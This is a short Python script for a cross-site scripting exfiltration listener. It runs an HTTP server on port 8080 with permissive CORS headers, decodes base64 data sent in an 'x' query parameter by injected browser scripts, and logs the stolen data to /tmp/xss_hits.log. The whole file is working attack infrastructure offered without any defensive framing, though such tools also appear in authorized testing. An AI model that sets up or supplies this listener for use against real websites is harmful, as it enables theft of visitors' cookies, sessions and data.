import http.server, urllib.parse, datetime, base64, sys

class H(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        ts = datetime.datetime.now().strftime("%H:%M:%S")
        qs = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        msg = "[%s] HIT %s PATH=%s" % (ts, self.client_address[0], self.path)
        if "x" in qs:
            try:
                raw = qs["x"][0]
                pad = raw + "=" * (4 - len(raw) % 4)
                data = base64.b64decode(pad).decode("utf-8", errors="replace")
                msg += " | DATA=" + data
            except Exception as e:
                msg += " | ERR=" + str(e)
        with open("/tmp/xss_hits.log", "a") as f:
            f.write(msg + "\n")
        print(msg)
        sys.stdout.flush()
        self.send_response(200)
        self.send_header("Access-Control-Allow-Origin", "*")
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")
    def log_message(self, *a):
        pass

print("XSS Listener UP on 0.0.0.0:8080")
sys.stdout.flush()
http.server.HTTPServer(("0.0.0.0", 8080), H).serve_forever()